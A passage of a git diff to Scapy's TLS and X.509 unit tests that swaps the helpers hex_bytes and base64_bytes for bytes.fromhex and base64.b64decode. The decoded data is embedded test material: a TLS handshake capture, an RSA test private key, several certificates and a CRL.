25b160006d6010006d2308206ce0a0100a08206c7308206c306092b0601050507300101048206b4308206b03081a5a21604149a0190a5b9942f43bc62113fcd3d404bead25250180f32303231303230383036303930325a307a3078304c300906052b0e03021a05000414521ee36c478119a9cb03fab74e57e1197af1818b0414b5760c3011cec792424d4cc75c2cc8a90ce80b6402136b000006c55514d0a6c4891be20000000006c58000180f32303231303230383036303930325aa011180f32303231303231323036303930325aa1023000300d06092a864886f70d01010b05000382010100784c3cee7765bf5cb164c0cf465462c37e97d11041443dcd9052e413747a71f8c37a051a29cdba11ea15cac3c252eeab533c7e9141431649a3a57a7dacc1fa697fdd360c139a35af181b7154574e7b87ade8da951d1894362082f80eb56d3775e729e930a097e72a7339e6e63719acc8166fd9c77c068cc75240a3b2149da8bcc24187addcfcc7330ad057b1d7a215380ea8e060b2a85330bc262c58e119672d846b87be7edf535d68a4bc2a643516df1c134401d96f0944d4d7ebe7a769ecdcfa90418486c9d62a9a4c46e232fa94221392f59a9c8df520b19e1214ed4ac70f54367b640924c48d2d3596056ff7424fc1734b98edc02dc67d8d72f6d10f44e8a08204f0308204ec308204e8308202d0a00302010202136b00086694d48d4b29943630f5000000086694300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3231303230323139353831335a170d3232303230323139353831335a30353133303106035504030c2a4d6963726f736f66745f5253415f544c535f49737375696e675f43415f30315f4b657942696e64696e6730820122300d06092a864886f70d01010105000382010f003082010a0282010100b65a936febea1694e5de2b8dfc1997d265f3582b94f9be1fb56bb96e2191c5df170bb52d276c30c8fdc876f1e5b3d9b900571e17fd505534f56db0ab7953261a34911e9fb0340aac76c1baede9a580ee86eba49f0e3d7cddcc60d973c69afc157aaa5d2d6ede3cd7d9a265098ee932fde13049e0f1490b2bb88bd56b6e26033ad99f49f6b7366eb275e6550c6b74f1823ac6dcf86a843825ade03f670a7ce895c840a7cfca247bc94d608ee30feefa8346470bc69f0f2e847b5896b377d70fa20e99d3af06b2d8c286b512fad8070cdc33f3302f48ad02014a21de13d1a04fbdf6fca54cc7364e303a1b458d2093fb8e98f686c2d8da374e757f8ac25b2210e70203010001a381d63081d3301d0603551d0e041604149a0190a5b9942f43bc62113fcd3d404bead25250300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070309300f06092b060105050730010504020500301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d81cc9b4781c8e916020164020107301b06092b060104018237150a040e300c300a06082b06010505070309300d06092a864886f70d01010b0500038202010012d83b821ff2afc4d67c63cee2d9a1045c1a1f0628274e1da3ef03fcdc720d420423478090afe6cbbaf4c753fdcad04aef5ca919c96ab9b540a64cc23d24181e7016391e780ae56a0897a372ea9a93a959c0d713ae0cbd5e6ca420724a110ac0901d671ea8c57ba31db062a7df4bbc8cb78d820262f9ba12e4313edb85155f69c47a05fa6171958e6577b61910357a5940a3c3f186eb07a37968c7f17b5614603aae4e71cb2d5f122bbea187888452239cb9c0d338d913604034e4eb3be2639a15836d08b4b4f38287414e5cd144a23aa95edb59236205397263ead5b0ef1a2239f54149f9b5992a2964a28373652a1bb31a772a04c5d4eef2fd0e5853094590ccc5b1bcb9fc1910d31652cc8f2e72c685665834f3826613dd456655ae9c9f21283a1684123fa144bc3276f50ead086fd9c149b670b27804057472602a984a3de016f65bf0980baa8a0cbadd53b061800347fec63d80b0b68d164e295e682a890ae433c439ae04a31dd8b9260c81692a110e8583038e767ceab2b87db2067eeb1973aa5bbcd5f3b4fca071ca60361d9815e87c76c44e9791c7aa25defaaaa28d72c709ad434b44974ed50546b685e215c7a70065503f0014d5f9f1fdf851930af51e7c425d0ea0d966377f44d60bf6345a05d750d2de25ebb1957bdac56b1d9a3a4e556bf398e063062ea7e1400a279abb085c1fadb9e517231b5fdcb0d868c10c00016903001861040089499a5bf709647d1cd5e41d381c15ab96100c86f0d66d0ba53a224b2adb7897f63de0368a080e17e80da5f70505d58c5317cb047dfeeecc1c7e160fdbf4747c78fb2641b233ad509c12de3a83c3d9cab174c8ca3a748d43766a11eeaa3e8c080401006f041a8741e47e744c7b6b83abf44bc722ae7f1ca19e12989106c2a78a37c8713cac664d1d1dbff6a566b05f478f15123fb155850cafeb36120e9fb24ae4fc5f4c6e4614ebcaf1dab4a79405325d4774cef1c85facffdf57c182c7e22d29facb2ee7460b716aaa6b5e3235036d21a6212414f2d75fc85caa91317fcd0318c651f8459f32bfbda3f3b2e04c1f0c2f8982ea16d2df599133881106b27d53276703bc43230f0fdcadb8b1fe13101d1055a14d6cc6af8fa48d6dd23a0a36fb5d6ebb8f5021e3e20900b5de2442da9853d2446d75b1c2198d24cdc2a5a3d07a9aab451e196c6c49fce20bdb71a7190de2964afd934a7f14afb7872a49ab6a7a5cf2d30e000000' -pkt = TLS(hex_bytes(data)) +pkt = TLS(bytes.fromhex(data)) assert [type(x) for x in pkt.msg] == [TLSServerHello, TLSCertificate, TLSCertificateStatus, TLSServerKeyExchange, TLSServerHelloDone] ############################################################################### diff --git a/test/scapy/layers/x509.uts b/test/scapy/layers/x509.uts index 456bb091342..92720968a3f 100644 --- a/test/scapy/layers/x509.uts +++ b/test/scapy/layers/x509.uts @@ -17,7 +17,7 @@ p = ASN1P_PRIVSEQ(s) + Private RSA & ECDSA keys class tests = Key class : Importing DER encoded RSA private key from scapy.layers.x509 import RSAPrivateKey -k = base64_bytes('MIIEowIBAAKCAQEAmFdqP+nTEZukS0lLP+yj1gNImsEIf7P2ySTunceYxwkm4VE5QReDbb2L5/HL\nA9pPmIeQLSq/BgO1meOcbOSJ2YVHQ28MQ56+8Crb6n28iycX4hp0H3AxRAjh0edX+q3yilvYJ4W9\n/NnIb/wAZwS0oJif/tTkVF77HybAfJde5Eqbp+bCKIvMWnambh9DRUyjrBBZo5dA1o32zpuFBrJd\nI8dmUpw9gtf0F0Ba8lGZm8Uqc0GyXeXOJUE2u7CiMu3M77BM6ZLLTcow5+bQImkmTL1SGhzwfinM\nE1e6p3Hm//pDjuJvFaY22k05LgLuyqc59vFiB3Toldz8+AbMNjvzAwIDAQABAoIBAH3KeJZL2hhI\n/1GXNMaU/PfDgFkgmYbxMA8JKusnm/SFjxAwBGnGI6UjBXpBgpQs2Nqm3ZseF9u8hmCKvGiCEX2G\nesCo2mSfmSQxD6RBrMTuQ99UXpxzBIscFnM/Zrs8lPBARGzmF2nI3qPxXtex4ABX5o0Cd4NfZlZj\npj96skUoO8+bd3I4OPUFYFFFuv81LoSQ6Hew0a8xtJXtKkDp9h1jTGGUOc189WACNoBLH0MGeVoS\nUfc1++RcC3cypUZ8fNP1OO6GBfv06f5oXES4ZbxGYpa+nCfNwb6V2gWbkvaYm7aFn0KWGNZXS1P3\nOcWv6IWdOmg2CI7MMBLJ0LyWVCECgYEAyMJYw195mvHl8VyxJ3HkxeQaaozWL4qhNQ0Kaw+mzD+j\nYdkbHb3aBYghsgEDZjnyOVblC7I+4smvAZJLWJaf6sZ5HAw3zmj1ibCkXx7deoRc/QVcOikl3dE/\nymO0KGJNiGzJZmxbRS3hTokmVPuxSWW4p5oSiMupFHKa18Uv8DECgYEAwkJ7iTOUL6b4e3lQuHQn\nJbsiQpd+P/bsIPP7kaaHObewfHpfOOtIdtN4asxVFf/PgW5uWmBllqAHZYR14DEYIdL+hdLrdvk5\nnYQ3YfhOnp+haHUPCdEiXrRZuGXjmMA4V0hL3HPF5ZM8H80fLnN8Pgn2rIC7CZQ46y4PnoV1nXMC\ngYBBwCUCF8rkDEWa/ximKo8aoNJmAypC98xEa7j1x3KBgnYoHcrbusok9ajTe7F5UZEbZnItmnsu\nG4/Nm/RBV1OYuNgBb573YzjHl6q93IX9EkzCMXc7NS7JrzaNOopOj6OFAtwTR3m89oHMDu8W9jfi\nKgaIHdXkJ4+AuugrstE4gQKBgFK0d1/8g7SeA+Cdz84YNaqMt5NeaDPXbsTA23QxUBU0rYDxoKTd\nFybv9a6SfA83sCLM31K/A8FTNJL2CDGA9WNBL3fOSs2GYg88AVBGpUJHeDK+0748OcPUSPaG+pVI\nETSn5RRgffq16r0nWYUvSdAn8cuTqw3y+yC1pZS6AU8dAoGBAL5QCi0dTWKN3kf3cXaCAnYiWe4Q\ng2S+SgLE+F1U4Xws2rqAuSvIiuT5i5+Mqk9ZCGdoReVbAovJFoRqe7Fj9yWM+b1awGjL0bOTtnqx\n0iljob6uFyhpl1xgW3a3ICJ/ZYLvkgb4IBEteOwWpp37fX57vzhW8EmUV2UX7ve1uNRI') +k = base64.b64decode('MIIEowIBAAKCAQEAmFdqP+nTEZukS0lLP+yj1gNImsEIf7P2ySTunceYxwkm4VE5QReDbb2L5/HL\nA9pPmIeQLSq/BgO1meOcbOSJ2YVHQ28MQ56+8Crb6n28iycX4hp0H3AxRAjh0edX+q3yilvYJ4W9\n/NnIb/wAZwS0oJif/tTkVF77HybAfJde5Eqbp+bCKIvMWnambh9DRUyjrBBZo5dA1o32zpuFBrJd\nI8dmUpw9gtf0F0Ba8lGZm8Uqc0GyXeXOJUE2u7CiMu3M77BM6ZLLTcow5+bQImkmTL1SGhzwfinM\nE1e6p3Hm//pDjuJvFaY22k05LgLuyqc59vFiB3Toldz8+AbMNjvzAwIDAQABAoIBAH3KeJZL2hhI\n/1GXNMaU/PfDgFkgmYbxMA8JKusnm/SFjxAwBGnGI6UjBXpBgpQs2Nqm3ZseF9u8hmCKvGiCEX2G\nesCo2mSfmSQxD6RBrMTuQ99UXpxzBIscFnM/Zrs8lPBARGzmF2nI3qPxXtex4ABX5o0Cd4NfZlZj\npj96skUoO8+bd3I4OPUFYFFFuv81LoSQ6Hew0a8xtJXtKkDp9h1jTGGUOc189WACNoBLH0MGeVoS\nUfc1++RcC3cypUZ8fNP1OO6GBfv06f5oXES4ZbxGYpa+nCfNwb6V2gWbkvaYm7aFn0KWGNZXS1P3\nOcWv6IWdOmg2CI7MMBLJ0LyWVCECgYEAyMJYw195mvHl8VyxJ3HkxeQaaozWL4qhNQ0Kaw+mzD+j\nYdkbHb3aBYghsgEDZjnyOVblC7I+4smvAZJLWJaf6sZ5HAw3zmj1ibCkXx7deoRc/QVcOikl3dE/\nymO0KGJNiGzJZmxbRS3hTokmVPuxSWW4p5oSiMupFHKa18Uv8DECgYEAwkJ7iTOUL6b4e3lQuHQn\nJbsiQpd+P/bsIPP7kaaHObewfHpfOOtIdtN4asxVFf/PgW5uWmBllqAHZYR14DEYIdL+hdLrdvk5\nnYQ3YfhOnp+haHUPCdEiXrRZuGXjmMA4V0hL3HPF5ZM8H80fLnN8Pgn2rIC7CZQ46y4PnoV1nXMC\ngYBBwCUCF8rkDEWa/ximKo8aoNJmAypC98xEa7j1x3KBgnYoHcrbusok9ajTe7F5UZEbZnItmnsu\nG4/Nm/RBV1OYuNgBb573YzjHl6q93IX9EkzCMXc7NS7JrzaNOopOj6OFAtwTR3m89oHMDu8W9jfi\nKgaIHdXkJ4+AuugrstE4gQKBgFK0d1/8g7SeA+Cdz84YNaqMt5NeaDPXbsTA23QxUBU0rYDxoKTd\nFybv9a6SfA83sCLM31K/A8FTNJL2CDGA9WNBL3fOSs2GYg88AVBGpUJHeDK+0748OcPUSPaG+pVI\nETSn5RRgffq16r0nWYUvSdAn8cuTqw3y+yC1pZS6AU8dAoGBAL5QCi0dTWKN3kf3cXaCAnYiWe4Q\ng2S+SgLE+F1U4Xws2rqAuSvIiuT5i5+Mqk9ZCGdoReVbAovJFoRqe7Fj9yWM+b1awGjL0bOTtnqx\n0iljob6uFyhpl1xgW3a3ICJ/ZYLvkgb4IBEteOwWpp37fX57vzhW8EmUV2UX7ve1uNRI') x=RSAPrivateKey(k) = Key class : key version @@ -53,7 +53,7 @@ x.coefficient == ASN1_INTEGER(13364209135497709980522851534062695694375984073722 + X509_Cert class tests = Cert class : Importing DER encoded X.509 Certificate with RSA public key from scapy.layers.x509 import X509_Cert -c = base64_bytes('MIIFEjCCA/qgAwIBAgIJALRecEPnCQtxMA0GCSqGSIb3DQEBBQUAMIG2MQswCQYDVQQGEwJGUjEO\nMAwGA1UECBMFUGFyaXMxDjAMBgNVBAcTBVBhcmlzMRcwFQYDVQQKEw5NdXNocm9vbSBDb3JwLjEe\nMBwGA1UECxMVTXVzaHJvb20gVlBOIFNlcnZpY2VzMSUwIwYDVQQDExxJS0V2MiBYLjUwOSBUZXN0\nIGNlcnRpZmljYXRlMScwJQYJKoZIhvcNAQkBFhhpa2V2Mi10ZXN0QG11c2hyb29tLmNvcnAwHhcN\nMDYwNzEzMDczODU5WhcNMjYwMzMwMDczODU5WjCBtjELMAkGA1UEBhMCRlIxDjAMBgNVBAgTBVBh\ncmlzMQ4wDAYDVQQHEwVQYXJpczEXMBUGA1UEChMOTXVzaHJvb20gQ29ycC4xHjAcBgNVBAsTFU11\nc2hyb29tIFZQTiBTZXJ2aWNlczElMCMGA1UEAxMcSUtFdjIgWC41MDkgVGVzdCBjZXJ0aWZpY2F0\nZTEnMCUGCSqGSIb3DQEJARYYaWtldjItdGVzdEBtdXNocm9vbS5jb3JwMIIBIjANBgkqhkiG9w0B\nAQEFAAOCAQ8AMIIBCgKCAQEAmFdqP+nTEZukS0lLP+yj1gNImsEIf7P2ySTunceYxwkm4VE5QReD\nbb2L5/HLA9pPmIeQLSq/BgO1meOcbOSJ2YVHQ28MQ56+8Crb6n28iycX4hp0H3AxRAjh0edX+q3y\nilvYJ4W9/NnIb/wAZwS0oJif/tTkVF77HybAfJde5Eqbp+bCKIvMWnambh9DRUyjrBBZo5dA1o32\nzpuFBrJdI8dmUpw9gtf0F0Ba8lGZm8Uqc0GyXeXOJUE2u7CiMu3M77BM6ZLLTcow5+bQImkmTL1S\nGhzwfinME1e6p3Hm//pDjuJvFaY22k05LgLuyqc59vFiB3Toldz8+AbMNjvzAwIDAQABo4IBHzCC\nARswHQYDVR0OBBYEFPPYTt6Q9+Zd0s4zzVxWjG+XFDFLMIHrBgNVHSMEgeMwgeCAFPPYTt6Q9+Zd\n0s4zzVxWjG+XFDFLoYG8pIG5MIG2MQswCQYDVQQGEwJGUjEOMAwGA1UECBMFUGFyaXMxDjAMBgNV\nBAcTBVBhcmlzMRcwFQYDVQQKEw5NdXNocm9vbSBDb3JwLjEeMBwGA1UECxMVTXVzaHJvb20gVlBO\nIFNlcnZpY2VzMSUwIwYDVQQDExxJS0V2MiBYLjUwOSBUZXN0IGNlcnRpZmljYXRlMScwJQYJKoZI\nhvcNAQkBFhhpa2V2Mi10ZXN0QG11c2hyb29tLmNvcnCCCQC0XnBD5wkLcTAMBgNVHRMEBTADAQH/\nMA0GCSqGSIb3DQEBBQUAA4IBAQA2zt0BvXofiVvHMWlftZCstQaawej1SmxrAfDB4NUM24NsG+UZ\nI88XA5XM6QolmfyKnNromMLC1+6CaFxjq3jC/qdS7ifalFLQVo7ik/te0z6Olo0RkBNgyagWPX2L\nR5kHe9RvSDuoPIsbSHMmJA98AZwatbvEhmzMINJNUoHVzhPeHZnIaBgUBg02XULk/ElidO51Rf3g\nh8dR/kgFQSQT687vs1x9TWD00z0Q2bs2UF3Ob3+NYkEGEo5F9RePQm0mY94CT2xs6WpHo060Fo7f\nVpAFktMWx1vpu+wsEbQAhgGqV0fCR2QwKDIbTrPW/p9HJtJDYVjYdAFxr3s7V77y') +c = base64.b64decode('MIIFEjCCA/qgAwIBAgIJALRecEPnCQtxMA0GCSqGSIb3DQEBBQUAMIG2MQswCQYDVQQGEwJGUjEO\nMAwGA1UECBMFUGFyaXMxDjAMBgNVBAcTBVBhcmlzMRcwFQYDVQQKEw5NdXNocm9vbSBDb3JwLjEe\nMBwGA1UECxMVTXVzaHJvb20gVlBOIFNlcnZpY2VzMSUwIwYDVQQDExxJS0V2MiBYLjUwOSBUZXN0\nIGNlcnRpZmljYXRlMScwJQYJKoZIhvcNAQkBFhhpa2V2Mi10ZXN0QG11c2hyb29tLmNvcnAwHhcN\nMDYwNzEzMDczODU5WhcNMjYwMzMwMDczODU5WjCBtjELMAkGA1UEBhMCRlIxDjAMBgNVBAgTBVBh\ncmlzMQ4wDAYDVQQHEwVQYXJpczEXMBUGA1UEChMOTXVzaHJvb20gQ29ycC4xHjAcBgNVBAsTFU11\nc2hyb29tIFZQTiBTZXJ2aWNlczElMCMGA1UEAxMcSUtFdjIgWC41MDkgVGVzdCBjZXJ0aWZpY2F0\nZTEnMCUGCSqGSIb3DQEJARYYaWtldjItdGVzdEBtdXNocm9vbS5jb3JwMIIBIjANBgkqhkiG9w0B\nAQEFAAOCAQ8AMIIBCgKCAQEAmFdqP+nTEZukS0lLP+yj1gNImsEIf7P2ySTunceYxwkm4VE5QReD\nbb2L5/HLA9pPmIeQLSq/BgO1meOcbOSJ2YVHQ28MQ56+8Crb6n28iycX4hp0H3AxRAjh0edX+q3y\nilvYJ4W9/NnIb/wAZwS0oJif/tTkVF77HybAfJde5Eqbp+bCKIvMWnambh9DRUyjrBBZo5dA1o32\nzpuFBrJdI8dmUpw9gtf0F0Ba8lGZm8Uqc0GyXeXOJUE2u7CiMu3M77BM6ZLLTcow5+bQImkmTL1S\nGhzwfinME1e6p3Hm//pDjuJvFaY22k05LgLuyqc59vFiB3Toldz8+AbMNjvzAwIDAQABo4IBHzCC\nARswHQYDVR0OBBYEFPPYTt6Q9+Zd0s4zzVxWjG+XFDFLMIHrBgNVHSMEgeMwgeCAFPPYTt6Q9+Zd\n0s4zzVxWjG+XFDFLoYG8pIG5MIG2MQswCQYDVQQGEwJGUjEOMAwGA1UECBMFUGFyaXMxDjAMBgNV\nBAcTBVBhcmlzMRcwFQYDVQQKEw5NdXNocm9vbSBDb3JwLjEeMBwGA1UECxMVTXVzaHJvb20gVlBO\nIFNlcnZpY2VzMSUwIwYDVQQDExxJS0V2MiBYLjUwOSBUZXN0IGNlcnRpZmljYXRlMScwJQYJKoZI\nhvcNAQkBFhhpa2V2Mi10ZXN0QG11c2hyb29tLmNvcnCCCQC0XnBD5wkLcTAMBgNVHRMEBTADAQH/\nMA0GCSqGSIb3DQEBBQUAA4IBAQA2zt0BvXofiVvHMWlftZCstQaawej1SmxrAfDB4NUM24NsG+UZ\nI88XA5XM6QolmfyKnNromMLC1+6CaFxjq3jC/qdS7ifalFLQVo7ik/te0z6Olo0RkBNgyagWPX2L\nR5kHe9RvSDuoPIsbSHMmJA98AZwatbvEhmzMINJNUoHVzhPeHZnIaBgUBg02XULk/ElidO51Rf3g\nh8dR/kgFQSQT687vs1x9TWD00z0Q2bs2UF3Ob3+NYkEGEo5F9RePQm0mY94CT2xs6WpHo060Fo7f\nVpAFktMWx1vpu+wsEbQAhgGqV0fCR2QwKDIbTrPW/p9HJtJDYVjYdAFxr3s7V77y') x=X509_Cert(c) = Cert class : Rebuild certificate @@ -152,7 +152,7 @@ else: = Cert class: Import Windows AD certificate from scapy.layers.x509 import X509_Cert -c = base64_bytes('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') +c = base64.b64decode('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') x=X509_Cert(c) = Cert class: Check some Windows-specific extensions @@ -184,7 +184,7 @@ assert ext[9].extnValue.value == b'S-1-5-21-1924137214-3718646274-40215721-1000' + X509_CRL class tests = CRL class : Importing DER encoded X.509 CRL from scapy.layers.x509 import X509_CRL -c = base64_bytes('MIICHjCCAYcwDQYJKoZIhvcNAQEFBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWdu\nLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0\naG9yaXR5Fw0wNjExMDIwMDAwMDBaFw0wNzAyMTcyMzU5NTlaMIH2MCECECzSS2LEl6QXzW6jyJx6\nLcgXDTA0MDQwMTE3NTYxNVowIQIQOkXeVssCzdzcTndjIhvU1RcNMDEwNTA4MTkyMjM0WjAhAhBB\nXYg2gRUg1YCDRqhZkngsFw0wMTA3MDYxNjU3MjNaMCECEEc5gf/9hIHxlfnrGMJ8DfEXDTAzMDEw\nOTE4MDYxMlowIQIQcFR+auK62HZ/R6mZEEFeZxcNMDIwOTIzMTcwMDA4WjAhAhB+C13eGPI5ZoKm\nj2UiOCPIFw0wMTA1MDgxOTA4MjFaMCICEQDQVEhgGGfTrTXKLw1KJ5VeFw0wMTEyMTExODI2MjFa\nMA0GCSqGSIb3DQEBBQUAA4GBACLJ9rsdoaU9JMf/sCIRs3AGW8VV3TN2oJgiCGNEac9PRyV3mRKE\n0